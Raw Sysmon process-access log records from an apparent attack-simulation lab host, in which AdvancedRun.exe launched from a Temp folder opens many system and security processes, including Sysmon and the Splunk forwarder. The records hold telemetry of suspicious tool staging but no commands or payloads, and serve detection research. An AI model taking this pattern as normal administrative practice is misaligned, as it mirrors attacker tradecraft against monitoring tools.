20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.915{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.914{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.913{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.913{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.913{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.912{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.911{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.911{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.907{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.904{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
